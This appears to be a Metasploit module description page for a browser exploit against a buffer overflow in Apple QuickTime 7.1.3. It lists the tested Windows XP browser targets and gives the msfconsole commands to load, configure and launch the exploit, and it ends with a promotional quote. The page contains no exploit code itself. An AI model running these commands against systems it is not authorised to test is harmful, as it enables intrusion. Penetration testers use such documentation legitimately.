This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. The Browser target for this module was tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin.
Windows
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/windows/browser/apple_quicktime_rtsp
msf exploit(apple_quicktime_rtsp) > show targets
...targets...
msf exploit(apple_quicktime_rtsp) > set TARGET < target-id >
msf exploit(apple_quicktime_rtsp) > show options
...show and set options...
msf exploit(apple_quicktime_rtsp) > exploit
Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
– Jim O’Gorman | President, Offensive Security